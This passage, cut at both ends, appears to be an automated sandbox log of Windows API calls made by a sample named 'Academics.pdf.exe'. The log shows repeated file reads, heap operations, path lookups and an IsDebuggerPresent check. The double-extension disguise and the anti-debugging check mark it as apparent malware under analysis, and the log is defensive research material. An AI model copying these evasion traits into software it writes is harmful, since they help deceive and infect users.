lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff9c [0132.626] SetFilePointer (in: hFile=0xec, lDistanceToMove=393096, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff88 [0132.626] ReadFile (in: hFile=0xec, lpBuffer=0x8af7fc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af6e8, lpOverlapped=0x0 | out: lpBuffer=0x8af7fc*, lpNumberOfBytesRead=0x8af6e8*=0x10000, lpOverlapped=0x0) returned 1 [0132.626] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff88 [0132.627] SetFilePointer (in: hFile=0xec, lDistanceToMove=458612, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff74 [0132.627] ReadFile (in: hFile=0xec, lpBuffer=0x8af7fc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af6e8, lpOverlapped=0x0 | out: lpBuffer=0x8af7fc*, lpNumberOfBytesRead=0x8af6e8*=0x10000, lpOverlapped=0x0) returned 1 [0132.627] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff74 [0132.627] SetFilePointer (in: hFile=0xec, lDistanceToMove=524128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff60 [0132.627] ReadFile (in: hFile=0xec, lpBuffer=0x8af7fc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af6e8, lpOverlapped=0x0 | out: lpBuffer=0x8af7fc*, lpNumberOfBytesRead=0x8af6e8*=0x10000, lpOverlapped=0x0) returned 1 [0132.627] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff60 [0132.627] SetFilePointer (in: hFile=0xec, lDistanceToMove=589644, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff4c [0132.628] ReadFile (in: hFile=0xec, lpBuffer=0x8af7fc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af6e8, lpOverlapped=0x0 | out: lpBuffer=0x8af7fc*, lpNumberOfBytesRead=0x8af6e8*=0x10000, lpOverlapped=0x0) returned 1 [0132.628] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff4c [0132.628] SetFilePointer (in: hFile=0xec, lDistanceToMove=655160, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff38 [0132.628] ReadFile (in: hFile=0xec, lpBuffer=0x8af7fc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af6e8, lpOverlapped=0x0 | out: lpBuffer=0x8af7fc*, lpNumberOfBytesRead=0x8af6e8*=0x10000, lpOverlapped=0x0) returned 1 [0132.628] SetFilePointer (in: hFile=0xec, lDistanceToMove=685588, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa7614 [0132.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1000) returned 0x25ce898 [0132.628] ReadFile (in: hFile=0xec, lpBuffer=0x25ce898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8af6cc, lpOverlapped=0x0 | out: lpBuffer=0x25ce898*, lpNumberOfBytesRead=0x8af6cc*=0x1000, lpOverlapped=0x0) returned 1 [0132.628] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bf6fc | out: lpSystemTimeAsFileTime=0x8bf6fc*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.629] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa8614 [0132.629] SetFilePointer (in: hFile=0xec, lDistanceToMove=685608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa7628 [0132.629] ReadFile (in: hFile=0xec, lpBuffer=0x25ce898, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bedd8, lpOverlapped=0x0 | out: lpBuffer=0x25ce898*, lpNumberOfBytesRead=0x8bedd8*=0x200, lpOverlapped=0x0) returned 1 [0132.629] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.629] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.629] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.629] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa7828 [0132.629] SetFilePointer (in: hFile=0xec, lDistanceToMove=685749, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa76b5 [0132.629] ReadFile (in: hFile=0xec, lpBuffer=0x25ce898, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bedd8, lpOverlapped=0x0 | out: lpBuffer=0x25ce898*, lpNumberOfBytesRead=0x8bedd8*=0x200, lpOverlapped=0x0) returned 1 [0132.630] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa78b5 [0132.630] SetFilePointer (in: hFile=0xec, lDistanceToMove=704599, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xac057 [0132.630] ReadFile (in: hFile=0xec, lpBuffer=0x25ce898, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bedd8, lpOverlapped=0x0 | out: lpBuffer=0x25ce898*, lpNumberOfBytesRead=0x8bedd8*=0x200, lpOverlapped=0x0) returned 1 [0132.630] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.630] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.630] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.630] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xac257 [0132.630] SetFilePointer (in: hFile=0xec, lDistanceToMove=704706, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xac0c2 [0132.630] ReadFile (in: hFile=0xec, lpBuffer=0x25ce898, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bedd8, lpOverlapped=0x0 | out: lpBuffer=0x25ce898*, lpNumberOfBytesRead=0x8bedd8*=0x200, lpOverlapped=0x0) returned 1 [0132.631] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xac2c2 [0132.631] SetFilePointer (in: hFile=0xec, lDistanceToMove=753613, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb7fcd [0132.631] ReadFile (in: hFile=0xec, lpBuffer=0x25ce898, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bedd8, lpOverlapped=0x0 | out: lpBuffer=0x25ce898*, lpNumberOfBytesRead=0x8bedd8*=0x200, lpOverlapped=0x0) returned 1 [0132.631] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.631] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.631] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.631] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb81cd [0132.631] SetFilePointer (in: hFile=0xec, lDistanceToMove=753720, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb8038 [0132.631] ReadFile (in: hFile=0xec, lpBuffer=0x25ce898, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bedd8, lpOverlapped=0x0 | out: lpBuffer=0x25ce898*, lpNumberOfBytesRead=0x8bedd8*=0x200, lpOverlapped=0x0) returned 1 [0132.632] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb8238 [0132.632] SetFilePointer (in: hFile=0xec, lDistanceToMove=804849, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc47f1 [0132.632] ReadFile (in: hFile=0xec, lpBuffer=0x25ce898, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bedd8, lpOverlapped=0x0 | out: lpBuffer=0x25ce898*, lpNumberOfBytesRead=0x8bedd8*=0x200, lpOverlapped=0x0) returned 1 [0132.632] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.632] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.632] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.632] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc49f1 [0132.632] SetFilePointer (in: hFile=0xec, lDistanceToMove=804960, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4860 [0132.632] ReadFile (in: hFile=0xec, lpBuffer=0x25ce898, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bedd8, lpOverlapped=0x0 | out: lpBuffer=0x25ce898*, lpNumberOfBytesRead=0x8bedd8*=0x200, lpOverlapped=0x0) returned 1 [0132.632] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4a60 [0132.632] SetFilePointer (in: hFile=0xec, lDistanceToMove=914502, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xdf446 [0132.633] ReadFile (in: hFile=0xec, lpBuffer=0x25ce898, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bedd8, lpOverlapped=0x0 | out: lpBuffer=0x25ce898*, lpNumberOfBytesRead=0x8bedd8*=0x200, lpOverlapped=0x0) returned 1 [0132.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.633] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xdf646 [0132.633] SetFilePointer (in: hFile=0xec, lDistanceToMove=914633, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xdf4c9 [0132.633] ReadFile (in: hFile=0xec, lpBuffer=0x25ce898, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bedd8, lpOverlapped=0x0 | out: lpBuffer=0x25ce898*, lpNumberOfBytesRead=0x8bedd8*=0x200, lpOverlapped=0x0) returned 1 [0132.633] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xdf6c9 [0132.633] SetFilePointer (in: hFile=0xec, lDistanceToMove=916741, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xdfd05 [0132.633] ReadFile (in: hFile=0xec, lpBuffer=0x25ce898, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bedd8, lpOverlapped=0x0 | out: lpBuffer=0x25ce898*, lpNumberOfBytesRead=0x8bedd8*=0x8, lpOverlapped=0x0) returned 1 [0132.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bedc4 | out: lpSystemTimeAsFileTime=0x8bedc4*(dwLowDateTime=0x5463ef0, dwHighDateTime=0x1d509d7)) [0132.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ce898 | out: hHeap=0x25c0000) returned 1 [0132.633] CloseHandle (hObject=0xec) returned 1 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce0e0 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x25ce898 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd840 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x25ce8c0 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce0f8 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd850 [0132.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ce0f8 | out: hHeap=0x25c0000) returned 1 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x25ce8e8 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce0f8 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce110 [0132.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ce898 | out: hHeap=0x25c0000) returned 1 [0132.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd840 | out: hHeap=0x25c0000) returned 1 [0132.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ce0e0 | out: hHeap=0x25c0000) returned 1 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce0e0 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd840 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce128 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd860 [0132.634] RtlSizeHeap (HeapHandle=0x25c0000, Flags=0x0, MemoryPointer=0x25c2a58) returned 0x80 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x25ce898 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce140 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd870 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce158 [0132.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ce0e0 | out: hHeap=0x25c0000) returned 1 [0132.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd840 | out: hHeap=0x25c0000) returned 1 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce0e0 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd840 [0132.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ce0e0 | out: hHeap=0x25c0000) returned 1 [0132.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd840 | out: hHeap=0x25c0000) returned 1 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce0e0 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd840 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x25ce910 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd880 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd890 [0132.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce170 [0132.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce188 [0132.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce1a0 [0132.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd8a0 [0132.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ce1a0 | out: hHeap=0x25c0000) returned 1 [0132.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd8a0 | out: hHeap=0x25c0000) returned 1 [0132.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ce188 | out: hHeap=0x25c0000) returned 1 [0132.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ce0e0 | out: hHeap=0x25c0000) returned 1 [0132.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd840 | out: hHeap=0x25c0000) returned 1 [0132.635] IsDebuggerPresent () returned 0 [0132.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x25ceb30 [0132.635] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", nBufferLength=0x104, lpBuffer=0x4a7f6c, lpFilePart=0x8bf9f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", lpFilePart=0x8bf9f4*="Academics.pdf.exe") returned 0x37 [0132.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ceb30 | out: hHeap=0x25c0000) returned 1 [0132.635] SHGetMalloc (in: ppMalloc=0x8bf9f4 | out: ppMalloc=0x8bf9f4*=0x757266bc) returned 0x0 [0132.635] SHGetDesktopFolder (in: ppshf=0x8bf9f0 | out: ppshf=0x8bf9f0*=0xa92a7c) returned 0x0 [0132.642] IShellFolder:ParseDisplayName (in: This=0xa92a7c, hwnd=0x0, pbc=0x0, pszDisplayName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", pchEaten=0x8bf9e8*=0x25ceb30, ppidl=0x8bf9ec, pdwAttributes=0x0 | out: pchEaten=0x8bf9e8*=0x0, ppidl=0x8bf9ec, pdwAttributes=0x0) returned 0x0 [0132.689] SHGetPathFromIDListW (in: pidl=0xa9c768, pszPath=0x8bf5d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe") returned 1 [0132.693] IMalloc:Free (This=0x757266bc, pv=0xa9c768) [0132.693] IUnknown:Release (This=0xa92a7c) returned 0x0 [0132.693] IUnknown:AddRef (This=0x757266bc) returned 0x1 [0132.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", nBufferLength=0x104, lpBuffer=0x8bf7e0, lpFilePart=0x8bf9f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", lpFilePart=0x8bf9f0*="Academics.pdf.exe") returned 0x37 [0132.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x25ceb30 [0132.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce0e0 [0132.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd840 [0132.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce188 [0132.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd8a0 [0132.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0132.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x25cd8b0 [0132.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x25cd8b0, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0132.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd8b0 | out: hHeap=0x25c0000) returned 1 [0132.693] GetLastError () returned 0x0 [0132.693] SetLastError (dwErrCode=0x0) [0132.693] GetLastError () returned 0x0 [0132.693] SetLastError (dwErrCode=0x0) [0132.693] GetLastError () returned 0x0 [0132.693] SetLastError (dwErrCode=0x0) [0132.693] GetLastError () returned 0x0 [0132.693] SetLastError (dwErrCode=0x0) [0132.693] GetLastError () returned 0x0 [0132.694] SetLastError (dwErrCode=0x0) [0132.694] GetLastError () returned 0x0 [0132.694] SetLastError (dwErrCode=0x0) [0132.694] GetLastError () returned 0x0 [0132.694] SetLastError (dwErrCode=0x0) [0132.694] GetLastError () returned 0x0 [0132.694] SetLastError (dwErrCode=0x0) [0132.694] GetLastError () returned 0x0 [0132.694] SetLastError (dwErrCode=0x0) [0132.694] GetLastError () returned 0x0 [0132.694] SetLastError (dwErrCode=0x0) [0132.694] GetLastError () returned 0x0 [0132.694] SetLastError (dwErrCode=0x0) [0132.694] GetLastError () returned 0x0 [0132.694] SetLastError (dwErrCode=0x0) [0132.695] GetLastError () returned 0x0 [0132.695] SetLastError (dwErrCode=0x0) [0132.695] GetLastError () returned 0x0 [0132.695] SetLastError (dwErrCode=0x0) [0132.695] GetLastError () returned 0x0 [0132.695] SetLastError (dwErrCode=0x0) [0132.695] GetLastError () returned 0x0 [0132.695] SetLastError (dwErrCode=0x0) [0132.695] GetLastError () returned 0x0 [0132.695] SetLastError (dwErrCode=0x0) [0132.695] GetLastError () returned 0x0 [0132.695] SetLastError (dwErrCode=0x0) [0132.695] GetLastError () returned 0x0 [0132.695] SetLastError (dwErrCode=0x0) [0132.695] GetLastError () returned 0x0 [0132.695] SetLastError (dwErrCode=0x0) [0132.695] GetLastError () returned 0x0 [0132.695] SetLastError (dwErrCode=0x0) [0132.695] GetLastError () returned 0x0 [0132.696] SetLastError (dwErrCode=0x0) [0132.696] GetLastError () returned 0x0 [0132.696] SetLastError (dwErrCode=0x0) [0132.696] GetLastError () returned 0x0 [0132.696] SetLastError (dwErrCode=0x0) [0132.696] GetLastError () returned 0x0 [0132.696] SetLastError (dwErrCode=0x0) [0132.696] GetLastError () returned 0x0 [0132.696] SetLastError (dwErrCode=0x0) [0132.696] GetLastError () returned 0x0 [0132.696] SetLastError (dwErrCode=0x0) [0132.696] GetLastError () returned 0x0 [0132.696] SetLastError (dwErrCode=0x0) [0132.696] GetLastError () returned 0x0 [0132.696] SetLastError (dwErrCode=0x0) [0132.696] GetLastError () returned 0x0 [0132.696] SetLastError (dwErrCode=0x0) [0132.696] GetLastError () returned 0x0 [0132.696] SetLastError (dwErrCode=0x0) [0132.696] GetLastError () returned 0x0 [0132.697] SetLastError (dwErrCode=0x0) [0132.697] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8bf67c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0132.697] GetFileType (hFile=0x154) returned 0x1 [0132.697] ReadFile (in: hFile=0x154, lpBuffer=0x8af794, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af680, lpOverlapped=0x0 | out: lpBuffer=0x8af794*, lpNumberOfBytesRead=0x8af680*=0x10000, lpOverlapped=0x0) returned 1 [0132.697] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0132.697] SetFilePointer (in: hFile=0x154, lDistanceToMove=65516, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffec [0132.698] ReadFile (in: hFile=0x154, lpBuffer=0x8af794, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af680, lpOverlapped=0x0 | out: lpBuffer=0x8af794*, lpNumberOfBytesRead=0x8af680*=0x10000, lpOverlapped=0x0) returned 1 [0132.698] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffec [0132.698] SetFilePointer (in: hFile=0x154, lDistanceToMove=131032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffd8 [0132.698] ReadFile (in: hFile=0x154, lpBuffer=0x8af794, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af680, lpOverlapped=0x0 | out: lpBuffer=0x8af794*, lpNumberOfBytesRead=0x8af680*=0x10000, lpOverlapped=0x0) returned 1 [0132.698] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffd8 [0132.699] SetFilePointer (in: hFile=0x154, lDistanceToMove=196548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffc4 [0132.699] ReadFile (in: hFile=0x154, lpBuffer=0x8af794, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af680, lpOverlapped=0x0 | out: lpBuffer=0x8af794*, lpNumberOfBytesRead=0x8af680*=0x10000, lpOverlapped=0x0) returned 1 [0132.699] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffc4 [0132.699] SetFilePointer (in: hFile=0x154, lDistanceToMove=262064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffb0 [0132.699] ReadFile (in: hFile=0x154, 